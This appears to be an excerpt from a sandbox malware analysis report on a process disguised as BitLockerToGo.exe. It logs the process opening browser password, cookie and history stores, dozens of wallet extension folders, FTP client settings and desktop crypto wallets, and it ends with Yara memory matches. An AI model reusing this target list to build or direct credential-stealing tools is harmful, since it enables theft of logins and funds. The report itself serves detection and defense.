              Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: BitLockerToGo.exe, 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NIKHQAIQAUJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\VAMYDFPUNDJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
              Source: Yara matchFile source: 00000002.00000003.1891269625.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1934857436.0000000000B21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1934926435.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1905348168.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.1891820407.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 7812, type: MEMORYSTR
